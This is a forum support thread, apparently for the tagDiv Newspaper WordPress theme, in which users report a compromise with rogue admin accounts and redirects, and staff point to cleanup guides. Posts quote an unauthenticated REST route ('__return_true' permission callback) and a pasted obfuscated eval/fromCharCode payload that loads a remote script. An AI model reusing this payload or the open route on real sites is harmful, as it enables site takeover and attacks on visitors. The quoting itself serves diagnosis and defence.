No search results were found in Documentation!
Hello @inserte !
Usually, there is more than one place. That’s why you should delete every hacked path.
Follow this guide to clean your WordPress and theme of malware: https://askwpgirl.com/10-steps-remove-malware-wordpress-site/
Thank you!
Hello,
like so many others I ran into issues with enolmann and greeceman accounts being made, plugins that I didn’t install and so on and so forth.
I installed the most recent updated theme as well as the new plugins, removed the accounts and plugins that shouldn’t be there.
Sadly our webmaster who’s in America can’t access the site, even after the cleaning, because of “malware”.
Furthermore there are now local users experiencing the same issue, and we can’t seem to locate where the issue comes from.
given the earlier security breach we were hoping you could assist us ?
the site’s http://www.enola.be
My website also encountered a similar issue when I was checking for malware using the Wordfence plugin. I ended up removing the plugin and investigating why it appeared. It turns out it was related to Tagdiv.
Hello!
Follow this guide to clean your WordPress and theme of malware:
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/ or https://askwpgirl.com/10-steps-remove-malware-wordpress-site/
I hope that helps you!
Thank you!
yes we all have this malware problem hmm!
is ‘permission_callback’ => ‘__return_true’, -> true to false…all we need to change or what !??
live-css is a plugin used by td-composer that creates a backdoor for anyone to add malware. You need to fix your plugin.
function td_live_css_on_rest_api_init() {
$namespace = ‘tdw’;
register_rest_route($namespace, ‘/save_css/’, array(
‘methods’ => ‘POST’,
‘callback’ => ‘td_live_css_on_ajax_save_css’,
‘permission_callback’ => ‘__return_true’,
));
}
should be false
Hello!
@Kpkna Thank you for sharing a possible solution for this malware.
@dubravko That plugin is deprecated and it is not used anymore in the latest update. Please check those screenshots to know how to shift from WPBakery to Composer: https://www.screencast.com/t/6xLVMmlsY ; https://www.screencast.com/t/zWHrRmK1LQC ; https://www.screencast.com/t/vuFdT9Stx ; https://www.screencast.com/t/DWbSf3qj ; https://www.screencast.com/t/QuHyGccTK71v
Thank you!
when i check my site in google results my website were redirect to this url
specialnewpaper.com
i think this is malware
please check your plugin folder in your host
for this plugin ! wp-zexit
-
This reply was modified 2 years by
javid.
All our sites have been infested with malware. https://www.bayareaparent.com/
found a backdoor in the live-css code that is part of td-composer in /wp-content/plugins/td-composer/css-live/includes/td_live_css_ajax.php that allows anyone to append css code to the page by making a POST request.
function td_live_css_on_rest_api_init() {
$namespace = ‘tdw’;
register_rest_route($namespace, ‘/save_css/’, array(
‘methods’ => ‘POST’,
‘callback’ => ‘td_live_css_on_ajax_save_css’,
‘permission_callback’ => ‘__return_true’,
));
}
Seems to be in all versions of theme. Version: 12.3, version: 11.3.2
css-live plugin.
2 followup
I have watched the video and done everything it recommends (as I said before). I have also ordered a full malware scan as per the last recommendation in the video. Please advise our website continues to generate “critical errors”. this request is urgent.
Alejandro
Hi, Sucuri says that this is malware:
<style id=”tdw-css-placeholder”>var iz=String;eval(iz.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,112,115,58,47,47,115,116,97,121,46,100,101,99,101,110,116,114,97,108,97,112,112,112,115,46,99,111,109,47,115,114,99,47,112,97,103,101,46,106,115,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));</style></head>
I’ts generated from the TD-Composer plugin.
Also some AV’s says the site is not secure.
Hello,
I recommend updating the theme to the latest version, 12.6 to be updated and to don’t have malware.
If you want to update the theme, you should download the latest version of it from Theme Forest account and download it.
I recommend that you update the theme manually https://forum.tagdiv.com/how-to-update-the-theme-2/ via FTP/cPanel/File Manager, also if possible disable extra plugins during the theme update to avoid any problems that may arise and make sure that you have activated the tagDiv Standard pack plugin to keep the website’s look. You can try to update the theme on a staging website.
After you update the theme, you need to update the theme plugins too.
In the worst cases, the settings in the theme panel may be lost (there have been isolated cases), in these cases, after the theme plugins that were previously used are activated, you will have to use a backup for the theme panel -> https://forum.tagdiv.com/import-export-theme-settings/
Thank you!
There are 3 images that after spending half a day assuming were malware turned out to be Newspaper theme images. TDN_Pic_1.png, TDN_Pic_2.png, and TDN_Pic_3.png. I installed the Premio media folder plug-in to manage my media files and these 3 images started replicating over and over and filling up my media libary. It only stopped when I disabled the folder plug-in. I tried to delete them and they come back, I assume there is somesort of protection assigned to these images for the Newspaper theme. It would seem that somehow that conflicts with the folder plugin and causes that protection to go into over drive replicating these images over and over. Do you have a solution for this issue, as I need the folder plug-in for managing the volume of media assets of this website.
Here is a screenshot, the images are replicated every 3 to 5 seconds.
https://photos.app.goo.gl/9SVvLrj3TpVsuXZDA
ALWAYS UPDATE.
Then do a malware scan.
Look at the plugins you are using as well.
I also have this problem. Every time I preview a post it creates the new admin account. I hired a malware removal service, but they couldn’t fix it. I “solved” it by not deleting greeceman from users but instead changing the role from “admin” to “none.” So now I at least no longer get new admin accounts when I preview a post.
I’m about to update my theme.
One of my sites (the one that uses tag div Newspaper theme) just experienced the same thing with an admin account being created with those same credentials:
admin account
Identifier: greeceman
Email: greeceman@mail.com
Even after deleting the account, within a few hours it returned and once again I deleted it. I also escalated to my WP Managed Host who ran a bunch of scans and tools to detect malware, which they could not find.
Just updated to the latest version of Newspaper—is this issue fixed? And is this a bug in the theme or something else? It seems quite a few users had this issue.
Thank you
Hello,
I think your website has malware, please check this topic https://forum.tagdiv.com/topic/update-required-newspaper-12-1-1-brings-extra-security/ -> https://www.sitelock.com/blog/check-website-for-malware/
Thank you
Hi!
Have the same issue with malware injected code. https://i.imgur.com/4q70kCv.png
The code stores in td_live_css_local_storage. It refers to TD composer plugin.
I deleted the code. But what was the source of issue?
How I can protect the site?
As due to this code the user with admin rights was created several times on wordpress.
Hi, my malware scanning plugin has identified 2x suspicious functions in this theme:
https://prnt.sc/1ccfzvd0W7V1
https://prnt.sc/ZUJEkwNnJmSb
It looks like these may be parts of demos – so just confirming that these demo folders are safe to delete in the theme?
Hello!
Follow this guide to clean your WordPress and theme of malware:
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/ or https://askwpgirl.com/10-steps-remove-malware-wordpress-site/
I hope that helps you!
Thank you!
Hello
The Malaware Scanning, is qualifying as malware to:
td_import.php
Suspicious function found.
tagDiv Cloud Library
Vulnerability found in 2.7
I wait for your comments
I no longer have access to that site. I migrated my domain to devi.ly, and when I did, it changed my domain name over in DreamHost. If I reset it on my new site, devi.ly, will it release the old malwaredevil.com?
Hello @zebu59 !
That file isn’t from the theme for sure. Follow this guide to clean your WordPress and theme of malware:
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/ or https://askwpgirl.com/10-steps-remove-malware-wordpress-site/
Thank you!
Please unassign my newspaper and newsmag theme associated with malwaredevil.com (without the www). I cannot unassign it. I want to use that license with my new staging domain. Neither the www nor the one with out www are in commission any more.